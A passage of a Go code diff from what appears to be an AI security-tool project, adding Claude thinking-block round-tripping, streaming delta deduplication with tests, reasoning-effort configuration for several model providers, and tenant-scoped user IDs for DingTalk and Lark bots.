return strings.TrimSpace(display)
|
||||
}
|
||||
d := strings.TrimSpace(display)
|
||||
if d == "" {
|
||||
return claudeReasoningRoundTripSep + string(js)
|
||||
}
|
||||
return d + claudeReasoningRoundTripSep + string(js)
|
||||
}
|
||||
|
||||
// parseClaudeReasoningAssistantBlocks extracts Anthropic thinking blocks from an OpenAI-style
|
||||
// reasoning_content string. When no suffix is present, blocks is nil (caller must not invent signatures).
|
||||
func parseClaudeReasoningAssistantBlocks(reasoningContent string) (display string, blocks []claudeContentBlock) {
|
||||
reasoningContent = strings.TrimSpace(reasoningContent)
|
||||
if reasoningContent == "" {
|
||||
return "", nil
|
||||
}
|
||||
idx := strings.LastIndex(reasoningContent, claudeReasoningRoundTripSep)
|
||||
if idx < 0 {
|
||||
return reasoningContent, nil
|
||||
}
|
||||
display = strings.TrimSpace(reasoningContent[:idx])
|
||||
jsonPart := strings.TrimSpace(reasoningContent[idx+len(claudeReasoningRoundTripSep):])
|
||||
var arr []struct {
|
||||
Type string `json:"type"`
|
||||
Thinking string `json:"thinking"`
|
||||
Signature string `json:"signature"`
|
||||
}
|
||||
if err := json.Unmarshal([]byte(jsonPart), &arr); err != nil {
|
||||
return reasoningContent, nil
|
||||
}
|
||||
for _, x := range arr {
|
||||
if x.Type != "thinking" {
|
||||
continue
|
||||
}
|
||||
blocks = append(blocks, claudeContentBlock{Type: "thinking", Thinking: x.Thinking, Signature: x.Signature})
|
||||
}
|
||||
return display, blocks
|
||||
}
|
||||
@@ -0,0 +1,102 @@
|
||||
package openai
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"strings"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestDisplayReasoningContent(t *testing.T) {
|
||||
raw := "hello" + claudeReasoningRoundTripSep + `[{"type":"thinking","thinking":"x","signature":"sig"}]`
|
||||
if d := DisplayReasoningContent(raw); d != "hello" {
|
||||
t.Fatalf("got %q", d)
|
||||
}
|
||||
if DisplayReasoningContent("plain") != "plain" {
|
||||
t.Fatal()
|
||||
}
|
||||
}
|
||||
|
||||
func TestAppendParseClaudeReasoningRoundTrip(t *testing.T) {
|
||||
blocks := []claudeContentBlock{
|
||||
{Type: "thinking", Thinking: "a", Signature: "s1"},
|
||||
{Type: "thinking", Thinking: "b", Signature: "s2"},
|
||||
}
|
||||
s := appendClaudeReasoningRoundTrip("sum", blocks)
|
||||
if !strings.Contains(s, claudeReasoningRoundTripSep) {
|
||||
t.Fatal("missing sep")
|
||||
}
|
||||
display, back := parseClaudeReasoningAssistantBlocks(s)
|
||||
if display != "sum" || len(back) != 2 {
|
||||
t.Fatalf("display=%q len=%d", display, len(back))
|
||||
}
|
||||
if back[0].Signature != "s1" || back[1].Thinking != "b" {
|
||||
t.Fatalf("%+v", back)
|
||||
}
|
||||
}
|
||||
|
||||
func TestConvertOpenAIToClaude_AssistantReasoningReplay(t *testing.T) {
|
||||
rc := appendClaudeReasoningRoundTrip("vis", []claudeContentBlock{
|
||||
{Type: "thinking", Thinking: "t1", Signature: "sig1"},
|
||||
})
|
||||
payload := map[string]interface{}{
|
||||
"model": "claude-3-5-sonnet-latest",
|
||||
"messages": []interface{}{
|
||||
map[string]interface{}{
|
||||
"role": "assistant",
|
||||
"content": "out",
|
||||
"reasoning_content": rc,
|
||||
},
|
||||
},
|
||||
}
|
||||
req, err := convertOpenAIToClaude(payload)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
if len(req.Messages) != 1 {
|
||||
t.Fatalf("messages=%d", len(req.Messages))
|
||||
}
|
||||
blocks := req.Messages[0].Content.Blocks
|
||||
if len(blocks) < 2 {
|
||||
t.Fatalf("blocks=%d", len(blocks))
|
||||
}
|
||||
if blocks[0].Type != "thinking" || blocks[0].Signature != "sig1" {
|
||||
t.Fatalf("first block %+v", blocks[0])
|
||||
}
|
||||
foundText := false
|
||||
for _, b := range blocks {
|
||||
if b.Type == "text" && b.Text == "out" {
|
||||
foundText = true
|
||||
}
|
||||
}
|
||||
if !foundText {
|
||||
t.Fatalf("blocks=%+v", blocks)
|
||||
}
|
||||
}
|
||||
|
||||
func TestClaudeToOpenAIResponseJSON_Thinking(t *testing.T) {
|
||||
claudeBody := []byte(`{
|
||||
"id":"msg_1","type":"message","role":"assistant","model":"x","stop_reason":"end_turn",
|
||||
"content":[
|
||||
{"type":"thinking","thinking":"step","signature":"sigx"},
|
||||
{"type":"text","text":"hi"}
|
||||
]
|
||||
}`)
|
||||
oai, err := claudeToOpenAIResponseJSON(claudeBody)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
var wrap map[string]interface{}
|
||||
if err := json.Unmarshal(oai, &wrap); err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
choices := wrap["choices"].([]interface{})
|
||||
ch0 := choices[0].(map[string]interface{})
|
||||
msg := ch0["message"].(map[string]interface{})
|
||||
rc, _ := msg["reasoning_content"].(string)
|
||||
if !strings.Contains(rc, "step") || !strings.Contains(rc, claudeReasoningRoundTripSep) {
|
||||
t.Fatalf("reasoning_content=%q", rc)
|
||||
}
|
||||
if msg["content"] != "hi" {
|
||||
t.Fatal()
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,56 @@
|
||||
package openai
|
||||
|
||||
import "testing"
|
||||
|
||||
func TestNormalizeStreamingDelta_RepeatedCharBoundary(t *testing.T) {
|
||||
// 流式在重复数字边界分片:不得把 "43" 的首字符与 "194" 尾字符误合并。
|
||||
cur, d := normalizeStreamingDelta("https://x:194", "43")
|
||||
if want := "https://x:19443"; cur != want {
|
||||
t.Fatalf("next: want %q got %q", want, cur)
|
||||
}
|
||||
if d != "43" {
|
||||
t.Fatalf("delta: want %q got %q", "43", d)
|
||||
}
|
||||
}
|
||||
|
||||
func TestNormalizeStreamingDelta_CumulativePrefix(t *testing.T) {
|
||||
cur, d := normalizeStreamingDelta("今天", "今天天气")
|
||||
if cur != "今天天气" || d != "天气" {
|
||||
t.Fatalf("got cur=%q d=%q", cur, d)
|
||||
}
|
||||
}
|
||||
|
||||
func TestNormalizeStreamingDelta_FullRetransmit(t *testing.T) {
|
||||
cur, d := normalizeStreamingDelta("今天", "今天")
|
||||
if d != "" || cur != "今天" {
|
||||
t.Fatalf("got cur=%q d=%q", cur, d)
|
||||
}
|
||||
}
|
||||
|
||||
func TestNormalizeStreamingDelta_SingleRuneRepeated(t *testing.T) {
|
||||
cur, d := normalizeStreamingDelta("呀", "呀")
|
||||
if want := "呀呀"; cur != want {
|
||||
t.Fatalf("next: want %q got %q", want, cur)
|
||||
}
|
||||
if d != "呀" {
|
||||
t.Fatalf("delta: want %q got %q", "呀", d)
|
||||
}
|
||||
cur, d = normalizeStreamingDelta("4", "4")
|
||||
if want := "44"; cur != want {
|
||||
t.Fatalf("next: want %q got %q", want, cur)
|
||||
}
|
||||
if d != "4" {
|
||||
t.Fatalf("delta: want %q got %q", "4", d)
|
||||
}
|
||||
}
|
||||
|
||||
func TestNormalizeStreamingDelta_CumulativeExtendsNumber(t *testing.T) {
|
||||
// 已缓冲 "194" 后收到累计串 "19443"(注意 "1943" 并非 "19443" 的前缀,不能靠误写的中间态测 HasPrefix)。
|
||||
cur, d := normalizeStreamingDelta("194", "19443")
|
||||
if want := "19443"; cur != want {
|
||||
t.Fatalf("next: want %q got %q", want, cur)
|
||||
}
|
||||
if d != "43" {
|
||||
t.Fatalf("delta: want %q got %q", "43", d)
|
||||
}
|
||||
}
|
||||
@@ -10,6 +10,7 @@ import (
|
||||
"net/http"
|
||||
"strings"
|
||||
"time"
|
||||
"unicode/utf8"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
|
||||
@@ -33,6 +34,32 @@ func (e *APIError) Error() string {
|
||||
return fmt.Sprintf("openai api error: status=%d body=%s", e.StatusCode, e.Body)
|
||||
}
|
||||
|
||||
// normalizeStreamingDelta 将可能是“累计片段/重发片段”的内容归一化为“纯增量”。
|
||||
// 部分兼容网关会返回累计 content;若直接 append 会出现重复文本。
|
||||
//
|
||||
// 注意:
|
||||
// - 不做「任意后缀与前缀重叠」合并;流式可能在重复字符边界分片("194"+"43"→"19443")。
|
||||
// - HasPrefix 仅在 incoming 严格长于 current 时视为累计全文,否则会把分片产生的第二个相同
|
||||
// 单字/单码点(叠字、44、22 等)误判为「整段重复」而吞字。
|
||||
// - incoming==current 仅当 current 长度 >1 个码点时才视为整包重发;单码点重复必须走拼接。
|
||||
// - 不再使用「current 以 incoming 结尾则丢弃」:否则 "1943"+"43" 会误吞增量(19443 显示成 1943)。
|
||||
// 若网关重复发送尾部片段,应重复送完整累计串,由 HasPrefix 分支去重。
|
||||
func normalizeStreamingDelta(current, incoming string) (next, delta string) {
|
||||
if incoming == "" {
|
||||
return current, ""
|
||||
}
|
||||
if current == "" {
|
||||
return incoming, incoming
|
||||
}
|
||||
if strings.HasPrefix(incoming, current) && len(incoming) > len(current) {
|
||||
return incoming, incoming[len(current):]
|
||||
}
|
||||
if incoming == current && utf8.RuneCountInString(current) > 1 {
|
||||
return current, ""
|
||||
}
|
||||
return current + incoming, incoming
|
||||
}
|
||||
|
||||
// NewClient 创建一个新的OpenAI客户端。
|
||||
func NewClient(cfg *config.OpenAIConfig, httpClient *http.Client, logger *zap.Logger) *Client {
|
||||
if httpClient == nil {
|
||||
@@ -219,6 +246,7 @@ func (c *Client) ChatCompletionStream(ctx context.Context, payload interface{},
|
||||
|
||||
reader := bufio.NewReader(resp.Body)
|
||||
var full strings.Builder
|
||||
fullText := ""
|
||||
|
||||
// 典型 SSE 结构:
|
||||
// data: {...}\n\n
|
||||
@@ -263,9 +291,14 @@ func (c *Client) ChatCompletionStream(ctx context.Context, payload interface{},
|
||||
continue
|
||||
}
|
||||
|
||||
full.WriteString(delta)
|
||||
var deltaOut string
|
||||
fullText, deltaOut = normalizeStreamingDelta(fullText, delta)
|
||||
if deltaOut == "" {
|
||||
continue
|
||||
}
|
||||
full.WriteString(deltaOut)
|
||||
if onDelta != nil {
|
||||
if err := onDelta(delta); err != nil {
|
||||
if err := onDelta(deltaOut); err != nil {
|
||||
return full.String(), err
|
||||
}
|
||||
}
|
||||
@@ -380,6 +413,7 @@ func (c *Client) ChatCompletionStreamWithToolCalls(
|
||||
|
||||
reader := bufio.NewReader(resp.Body)
|
||||
var full strings.Builder
|
||||
fullText := ""
|
||||
finishReason := ""
|
||||
|
||||
for {
|
||||
@@ -426,10 +460,14 @@ func (c *Client) ChatCompletionStreamWithToolCalls(
|
||||
content = delta.Text
|
||||
}
|
||||
if content != "" {
|
||||
full.WriteString(content)
|
||||
if onContentDelta != nil {
|
||||
if err := onContentDelta(content); err != nil {
|
||||
return full.String(), nil, finishReason, err
|
||||
var contentOut string
|
||||
fullText, contentOut = normalizeStreamingDelta(fullText, content)
|
||||
if contentOut != "" {
|
||||
full.WriteString(contentOut)
|
||||
if onContentDelta != nil {
|
||||
if err := onContentDelta(contentOut); err != nil {
|
||||
return full.String(), nil, finishReason, err
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -0,0 +1,250 @@
|
||||
// Package reasoning maps user/config intent to CloudWeGo Eino OpenAI ChatModel fields
|
||||
// (ReasoningEffort, ExtraFields such as thinking / reasoning_effort / output_config).
|
||||
package reasoning
|
||||
|
||||
import (
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
|
||||
einoopenai "github.com/cloudwego/eino-ext/components/model/openai"
|
||||
)
|
||||
|
||||
// ClientIntent is optional per-request override from ChatRequest.reasoning.
|
||||
type ClientIntent struct {
|
||||
Mode string
|
||||
Effort string
|
||||
}
|
||||
|
||||
type wireProfile int
|
||||
|
||||
const (
|
||||
wireNone wireProfile = iota
|
||||
wireClaude
|
||||
wireDeepseek
|
||||
wireOpenAI
|
||||
wireOutputConfig
|
||||
)
|
||||
|
||||
// ApplyToEinoChatModelConfig merges reasoning-related options into cfg.
|
||||
// Precondition: cfg already has APIKey, BaseURL, Model, HTTPClient set.
|
||||
func ApplyToEinoChatModelConfig(cfg *einoopenai.ChatModelConfig, oa *config.OpenAIConfig, client *ClientIntent) {
|
||||
if cfg == nil || oa == nil {
|
||||
return
|
||||
}
|
||||
sr := &oa.Reasoning
|
||||
allowClient := sr.AllowClientReasoningEffective()
|
||||
mode := effectiveMode(sr, client, allowClient)
|
||||
|
||||
// Claude (Anthropic): merge admin extras first; optional extended thinking maps to top-level `thinking`
|
||||
// (see internal/openai convertOpenAIToClaude). DeepSeek/OpenAI-style fields are not sent.
|
||||
if strings.EqualFold(strings.TrimSpace(oa.Provider), "claude") ||
|
||||
strings.EqualFold(strings.TrimSpace(oa.Provider), "anthropic") {
|
||||
if len(sr.ExtraRequestFields) > 0 {
|
||||
if cfg.ExtraFields == nil {
|
||||
cfg.ExtraFields = make(map[string]any)
|
||||
}
|
||||
for k, v := range sr.ExtraRequestFields {
|
||||
cfg.ExtraFields[k] = v
|
||||
}
|
||||
}
|
||||
if mode == "off" {
|
||||
return
|
||||
}
|
||||
applyClaudeExtendedThinking(cfg, mode, effectiveEffort(sr, client, allowClient), oa.Model)
|
||||
return
|
||||
}
|
||||
|
||||
if mode == "off" {
|
||||
return
|
||||
}
|
||||
effort := effectiveEffort(sr, client, allowClient)
|
||||
prof := resolveWireProfile(oa, sr)
|
||||
|
||||
// Admin-defined extra root fields (merged first; automatic keys may follow).
|
||||
if len(sr.ExtraRequestFields) > 0 {
|
||||
if cfg.ExtraFields == nil {
|
||||
cfg.ExtraFields = make(map[string]any)
|
||||
}
|
||||
for k, v := range sr.ExtraRequestFields {
|
||||
cfg.ExtraFields[k] = v
|
||||
}
|
||||
}
|
||||
|
||||
switch prof {
|
||||
case wireClaude, wireNone:
|
||||
return
|
||||
case wireDeepseek:
|
||||
applyDeepseek(cfg, mode, effort)
|
||||
case wireOutputConfig:
|
||||
applyOutputConfigEffort(cfg, mode, effort)
|
||||
default: // wireOpenAI
|
||||
applyOpenAICompat(cfg, mode, effort)
|
||||
}
|
||||
}
|
||||
|
||||
// applyClaudeExtendedThinking sets Anthropic Messages API `thinking` when absent from ExtraRequestFields.
|
||||
// Uses adaptive + summarized display by default (per Anthropic guidance for Claude 4.x); Sonnet 3.7 uses enabled+budget.
|
||||
func applyClaudeExtendedThinking(cfg *einoopenai.ChatModelConfig, mode, effort, model string) {
|
||||
if cfg == nil || mode == "off" {
|
||||
return
|
||||
}
|
||||
if cfg.ExtraFields == nil {
|
||||
cfg.ExtraFields = make(map[string]any)
|
||||
}
|
||||
if _, exists := cfg.ExtraFields["thinking"]; exists {
|
||||
return
|
||||
}
|
||||
m := strings.ToLower(strings.TrimSpace(model))
|
||||
thinking := map[string]any{
|
||||
"type": "adaptive",
|
||||
"display": "summarized",
|
||||
}
|
||||
// Sonnet 3.7: manual extended thinking is the documented path.
|
||||
if strings.Contains(m, "claude-3-7-sonnet") || strings.Contains(m, "3-7-sonnet") || strings.Contains(m, "sonnet-3.7") {
|
||||
thinking = map[string]any{
|
||||
"type": "enabled",
|
||||
"budget_tokens": 10000,
|
||||
"display": "summarized",
|
||||
}
|
||||
}
|
||||
// Opus 4.7+: manual enabled+budget rejected — keep adaptive only.
|
||||
if strings.Contains(m, "opus-4-7") || strings.Contains(m, "opus-4.7") {
|
||||
thinking = map[string]any{
|
||||
"type": "adaptive",
|
||||
"display": "summarized",
|
||||
}
|
||||
}
|
||||
_ = effort // reserved: map to Anthropic effort / output_config when API stabilizes in one place
|
||||
cfg.ExtraFields["thinking"] = thinking
|
||||
}
|
||||
|
||||
func effectiveMode(sr *config.OpenAIReasoningConfig, client *ClientIntent, allowClient bool) string {
|
||||
server := strings.ToLower(strings.TrimSpace(sr.ModeEffective()))
|
||||
if server == "" || server == "default" {
|
||||
server = "auto"
|
||||
}
|
||||
if !allowClient || client == nil {
|
||||
return server
|
||||
}
|
||||
cm := strings.ToLower(strings.TrimSpace(client.Mode))
|
||||
if cm == "" || cm == "default" {
|
||||
return server
|
||||
}
|
||||
return cm
|
||||
}
|
||||
|
||||
func effectiveEffort(sr *config.OpenAIReasoningConfig, client *ClientIntent, allowClient bool) string {
|
||||
se := normalizeEffort(sr.Effort)
|
||||
if !allowClient || client == nil {
|
||||
return se
|
||||
}
|
||||
ce := normalizeEffort(client.Effort)
|
||||
if ce != "" {
|
||||
return ce
|
||||
}
|
||||
return se
|
||||
}
|
||||
|
||||
func normalizeEffort(s string) string {
|
||||
e := strings.ToLower(strings.TrimSpace(s))
|
||||
switch e {
|
||||
case "low", "medium", "high", "max":
|
||||
return e
|
||||
default:
|
||||
return ""
|
||||
}
|
||||
}
|
||||
|
||||
func resolveWireProfile(oa *config.OpenAIConfig, sr *config.OpenAIReasoningConfig) wireProfile {
|
||||
if strings.EqualFold(strings.TrimSpace(oa.Provider), "claude") {
|
||||
return wireClaude
|
||||
}
|
||||
p := strings.ToLower(strings.TrimSpace(sr.ProfileEffective()))
|
||||
switch p {
|
||||
case "output_config", "output_config_effort":
|
||||
return wireOutputConfig
|
||||
case "openai", "openai_compat":
|
||||
return wireOpenAI
|
||||
case "deepseek", "deepseek_compat":
|
||||
return wireDeepseek
|
||||
case "auto", "":
|
||||
bu := strings.ToLower(oa.BaseURL)
|
||||
mo := strings.ToLower(oa.Model)
|
||||
if strings.Contains(bu, "deepseek") || strings.Contains(mo, "deepseek") {
|
||||
return wireDeepseek
|
||||
}
|
||||
return wireOpenAI
|
||||
default:
|
||||
return wireOpenAI
|
||||
}
|
||||
}
|
||||
|
||||
func applyDeepseek(cfg *einoopenai.ChatModelConfig, mode, effort string) {
|
||||
// auto: enable thinking for DeepSeek line; on: same; auto without effort still opens thinking.
|
||||
if mode == "off" {
|
||||
return
|
||||
}
|
||||
if mode == "auto" || mode == "on" {
|
||||
if cfg.ExtraFields == nil {
|
||||
cfg.ExtraFields = make(map[string]any)
|
||||
}
|
||||
cfg.ExtraFields["thinking"] = map[string]any{"type": "enabled"}
|
||||
}
|
||||
if effort != "" {
|
||||
if cfg.ExtraFields == nil {
|
||||
cfg.ExtraFields = make(map[string]any)
|
||||
}
|
||||
cfg.ExtraFields["reasoning_effort"] = effortStringForAPI(effort)
|
||||
}
|
||||
}
|
||||
|
||||
func applyOpenAICompat(cfg *einoopenai.ChatModelConfig, mode, effort string) {
|
||||
if mode == "auto" && effort == "" {
|
||||
return
|
||||
}
|
||||
e := effort
|
||||
if mode == "on" && e == "" {
|
||||
e = "medium"
|
||||
}
|
||||
if e == "" {
|
||||
return
|
||||
}
|
||||
if e == "max" {
|
||||
if cfg.ExtraFields == nil {
|
||||
cfg.ExtraFields = make(map[string]any)
|
||||
}
|
||||
cfg.ExtraFields["reasoning_effort"] = "max"
|
||||
return
|
||||
}
|
||||
switch e {
|
||||
case "low":
|
||||
cfg.ReasoningEffort = einoopenai.ReasoningEffortLevelLow
|
||||
case "medium":
|
||||
cfg.ReasoningEffort = einoopenai.ReasoningEffortLevelMedium
|
||||
case "high":
|
||||
cfg.ReasoningEffort = einoopenai.ReasoningEffortLevelHigh
|
||||
}
|
||||
}
|
||||
|
||||
func applyOutputConfigEffort(cfg *einoopenai.ChatModelConfig, mode, effort string) {
|
||||
if mode == "auto" && effort == "" {
|
||||
return
|
||||
}
|
||||
e := effort
|
||||
if mode == "on" && e == "" {
|
||||
e = "high"
|
||||
}
|
||||
if e == "" {
|
||||
return
|
||||
}
|
||||
if cfg.ExtraFields == nil {
|
||||
cfg.ExtraFields = make(map[string]any)
|
||||
}
|
||||
cfg.ExtraFields["output_config"] = map[string]any{"effort": effortStringForAPI(e)}
|
||||
}
|
||||
|
||||
func effortStringForAPI(e string) string {
|
||||
// Gateways expect lowercase strings; "max" kept as max.
|
||||
return strings.ToLower(strings.TrimSpace(e))
|
||||
}
|
||||
+21
-7
@@ -23,22 +23,23 @@ const (
|
||||
|
||||
// StartDing 启动钉钉 Stream 长连接(无需公网),收到消息后调用 handler 并通过 SessionWebhook 回复。
|
||||
// 断线(如笔记本睡眠、网络中断)后会自动重连;ctx 被取消时退出,便于配置变更时重启。
|
||||
func StartDing(ctx context.Context, cfg config.RobotDingtalkConfig, h MessageHandler, logger *zap.Logger) {
|
||||
func StartDing(ctx context.Context, robotsCfg config.RobotsConfig, h MessageHandler, logger *zap.Logger) {
|
||||
cfg := robotsCfg.Dingtalk
|
||||
if !cfg.Enabled || cfg.ClientID == "" || cfg.ClientSecret == "" {
|
||||
return
|
||||
}
|
||||
go runDingLoop(ctx, cfg, h, logger)
|
||||
go runDingLoop(ctx, cfg, robotsCfg.Session.StrictUserIdentityEnabled(), h, logger)
|
||||
}
|
||||
|
||||
// runDingLoop 循环维持钉钉长连接:断开且 ctx 未取消时按退避间隔重连。
|
||||
func runDingLoop(ctx context.Context, cfg config.RobotDingtalkConfig, h MessageHandler, logger *zap.Logger) {
|
||||
func runDingLoop(ctx context.Context, cfg config.RobotDingtalkConfig, strictUserIdentity bool, h MessageHandler, logger *zap.Logger) {
|
||||
backoff := dingReconnectInitial
|
||||
for {
|
||||
streamClient := client.NewStreamClient(
|
||||
client.WithAppCredential(client.NewAppCredentialConfig(cfg.ClientID, cfg.ClientSecret)),
|
||||
client.WithSubscription(dingutils.SubscriptionTypeKCallback, "/v1.0/im/bot/messages/get",
|
||||
chatbot.NewDefaultChatBotFrameHandler(func(ctx context.Context, msg *chatbot.BotCallbackDataModel) ([]byte, error) {
|
||||
go handleDingMessage(ctx, msg, h, logger)
|
||||
go handleDingMessage(ctx, msg, cfg, strictUserIdentity, h, logger)
|
||||
return nil, nil
|
||||
}).OnEventReceived),
|
||||
)
|
||||
@@ -66,7 +67,7 @@ func runDingLoop(ctx context.Context, cfg config.RobotDingtalkConfig, h MessageH
|
||||
}
|
||||
}
|
||||
|
||||
func handleDingMessage(ctx context.Context, msg *chatbot.BotCallbackDataModel, h MessageHandler, logger *zap.Logger) {
|
||||
func handleDingMessage(ctx context.Context, msg *chatbot.BotCallbackDataModel, cfg config.RobotDingtalkConfig, strictUserIdentity bool, h MessageHandler, logger *zap.Logger) {
|
||||
if msg == nil || msg.SessionWebhook == "" {
|
||||
return
|
||||
}
|
||||
@@ -93,9 +94,22 @@ func handleDingMessage(ctx context.Context, msg *chatbot.BotCallbackDataModel, h
|
||||
return
|
||||
}
|
||||
logger.Info("钉钉收到消息", zap.String("sender", msg.SenderId), zap.String("content", content))
|
||||
userID := msg.SenderId
|
||||
tenantKey := strings.TrimSpace(cfg.ClientID)
|
||||
if tenantKey == "" {
|
||||
tenantKey = "default"
|
||||
}
|
||||
userID := strings.TrimSpace(msg.SenderId)
|
||||
if userID != "" {
|
||||
userID = "t:" + tenantKey + "|u:" + userID
|
||||
} else if cfg.AllowConversationIDFallback && !strictUserIdentity {
|
||||
conversationID := strings.TrimSpace(msg.ConversationId)
|
||||
if conversationID != "" {
|
||||
userID = "t:" + tenantKey + "|c:" + conversationID
|
||||
}
|
||||
}
|
||||
if userID == "" {
|
||||
userID = msg.ConversationId
|
||||
logger.Warn("钉钉消息缺少可用用户标识,已忽略")
|
||||
return
|
||||
}
|
||||
reply := h.HandleMessage("dingtalk", userID, content)
|
||||
// 使用 markdown 类型以便正确展示标题、列表、代码块等格式
|
||||
|
||||
+38
-8
@@ -27,20 +27,21 @@ type larkTextContent struct {
|
||||
|
||||
// StartLark 启动飞书长连接(无需公网),收到消息后调用 handler 并回复。
|
||||
// 断线(如笔记本睡眠、网络中断)后会自动重连;ctx 被取消时退出,便于配置变更时重启。
|
||||
func StartLark(ctx context.Context, cfg config.RobotLarkConfig, h MessageHandler, logger *zap.Logger) {
|
||||
func StartLark(ctx context.Context, robotsCfg config.RobotsConfig, h MessageHandler, logger *zap.Logger) {
|
||||
cfg := robotsCfg.Lark
|
||||
if !cfg.Enabled || cfg.AppID == "" || cfg.AppSecret == "" {
|
||||
return
|
||||
}
|
||||
go runLarkLoop(ctx, cfg, h, logger)
|
||||
go runLarkLoop(ctx, cfg, robotsCfg.Session.StrictUserIdentityEnabled(), h, logger)
|
||||
}
|
||||
|
||||
// runLarkLoop 循环维持飞书长连接:断开且 ctx 未取消时按退避间隔重连。
|
||||
func runLarkLoop(ctx context.Context, cfg config.RobotLarkConfig, h MessageHandler, logger *zap.Logger) {
|
||||
func runLarkLoop(ctx context.Context, cfg config.RobotLarkConfig, strictUserIdentity bool, h MessageHandler, logger *zap.Logger) {
|
||||
backoff := larkReconnectInitial
|
||||
for {
|
||||
larkClient := lark.NewClient(cfg.AppID, cfg.AppSecret)
|
||||
eventHandler := dispatcher.NewEventDispatcher("", "").OnP2MessageReceiveV1(func(ctx context.Context, event *larkim.P2MessageReceiveV1) error {
|
||||
go handleLarkMessage(ctx, event, h, larkClient, logger)
|
||||
go handleLarkMessage(ctx, event, cfg, strictUserIdentity, h, larkClient, logger)
|
||||
return nil
|
||||
})
|
||||
wsClient := larkws.NewClient(cfg.AppID, cfg.AppSecret,
|
||||
@@ -70,7 +71,7 @@ func runLarkLoop(ctx context.Context, cfg config.RobotLarkConfig, h MessageHandl
|
||||
}
|
||||
}
|
||||
|
||||
func handleLarkMessage(ctx context.Context, event *larkim.P2MessageReceiveV1, h MessageHandler, client *lark.Client, logger *zap.Logger) {
|
||||
func handleLarkMessage(ctx context.Context, event *larkim.P2MessageReceiveV1, cfg config.RobotLarkConfig, strictUserIdentity bool, h MessageHandler, client *lark.Client, logger *zap.Logger) {
|
||||
if event == nil || event.Event == nil || event.Event.Message == nil || event.Event.Sender == nil || event.Event.Sender.SenderId == nil {
|
||||
return
|
||||
}
|
||||
@@ -89,9 +90,10 @@ func handleLarkMessage(ctx context.Context, event *larkim.P2MessageReceiveV1, h
|
||||
if text == "" {
|
||||
return
|
||||
}
|
||||
userID := ""
|
||||
if event.Event.Sender.SenderId.UserId != nil {
|
||||
userID = *event.Event.Sender.SenderId.UserId
|
||||
userID := resolveLarkUserID(event, cfg.AllowChatIDFallback && !strictUserIdentity)
|
||||
if userID == "" {
|
||||
logger.Warn("飞书消息缺少可用用户标识,已忽略")
|
||||
return
|
||||
}
|
||||
messageID := larkcore.StringValue(msg.MessageId)
|
||||
reply := h.HandleMessage("lark", userID, text)
|
||||
@@ -109,3 +111,31 @@ func handleLarkMessage(ctx context.Context, event *larkim.P2MessageReceiveV1, h
|
||||
}
|
||||
logger.Debug("飞书已回复", zap.String("message_id", messageID))
|
||||
}
|
||||
|
||||
// resolveLarkUserID 提取飞书会话隔离键:
|
||||
// tenant_key + 稳定用户标识(user_id/open_id/union_id);按配置可选 chat_id 兜底。
|
||||
func resolveLarkUserID(event *larkim.P2MessageReceiveV1, allowChatIDFallback bool) string {
|
||||
if event == nil || event.Event == nil || event.Event.Sender == nil || event.Event.Sender.SenderId == nil {
|
||||
return ""
|
||||
}
|
||||
tenantKey := strings.TrimSpace(larkcore.StringValue(event.Event.Sender.TenantKey))
|
||||
if tenantKey == "" {
|
||||
tenantKey = "default"
|
||||
}
|
||||
prefix := "t:" + tenantKey + "|"
|
||||
if id := strings.TrimSpace(larkcore.StringValue(event.Event.Sender.SenderId.UserId)); id != "" {
|
||||
return prefix + "u:" + id
|
||||
}
|
||||
if id := strings.TrimSpace(larkcore.StringValue(event.Event.Sender.SenderId.OpenId)); id != "" {
|
||||
return prefix + "o:" + id
|
||||
}
|
||||
if id := strings.TrimSpace(larkcore.StringValue(event.Event.Sender.SenderId.UnionId)); id != "" {
|
||||
return prefix + "n:" + id
|
||||
}
|
||||
if allowChatIDFallback && event.Event.Message != nil {
|
||||
if id := strings.TrimSpace(larkcore.StringValue(event.Event.Message.ChatId)); id != "" {
|
||||
return prefix + "c:" + id
|
||||
}
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
@@ -153,6 +153,7 @@ func (e *Executor) ExecuteTool(ctx context.Context, toolName string, args map[st
|
||||
// 执行命令
|
||||
cmd := exec.CommandContext(ctx, toolConfig.Command, cmdArgs...)
|
||||
applyDefaultTerminalEnv(cmd)
|
||||
_ = prepareShellCmdSession(cmd)
|
||||
|
||||
e.logger.Info("执行安全工具",
|
||||
zap.String("tool", toolName),
|
||||
@@ -163,13 +164,14 @@ func (e *Executor) ExecuteTool(ctx context.Context, toolName string, args map[st
|
||||
var err error
|
||||
// 如果上层提供了 stdout/stderr 增量回调,则边执行边读取并回调。
|
||||
if cb, ok := ctx.Value(ToolOutputCallbackCtxKey).(ToolOutputCallback); ok && cb != nil {
|
||||
output, err = streamCommandOutput(cmd, cb)
|
||||
output, err = streamCommandOutput(ctx, cmd, cb)
|
||||
if err != nil && shouldRetryWithPTY(output) {
|
||||
e.logger.Info("检测到工具需要 TTY,使用 PTY 重试",
|
||||
zap.String("tool", toolName),
|
||||
)
|
||||
cmd2 := exec.CommandContext(ctx, toolConfig.Command, cmdArgs...)
|
||||
applyDefaultTerminalEnv(cmd2)
|
||||
_ = prepareShellCmdSession(cmd2)
|
||||
output, err = runCommandWithPTY(ctx, cmd2, cb)
|
||||
}
|
||||
} else {
|
||||
@@ -182,6 +184,7 @@ func (e *Executor) ExecuteTool(ctx context.Context, toolName string, args map[st
|
||||
)
|
||||
cmd2 := exec.CommandContext(ctx, toolConfig.Command, cmdArgs...)
|
||||
applyDefaultTerminalEnv(cmd2)
|
||||
_ = prepareShellCmdSession(cmd2)
|
||||
output, err = runCommandWithPTY(ctx, cmd2, nil)
|
||||
}
|
||||
}
|
||||
@@ -699,9 +702,9 @@ func (e *Executor) formatParamValue(param config.ParameterConfig, value interfac
|
||||
}
|
||||
}
|
||||
|
||||
// isBackgroundCommand 检测命令是否为完全后台命令(末尾有 & 符号,但不在引号内)
|
||||
// 注意:command1 & command2 这种情况不算完全后台,因为command2会在前台执行
|
||||
func (e *Executor) isBackgroundCommand(command string) bool {
|
||||
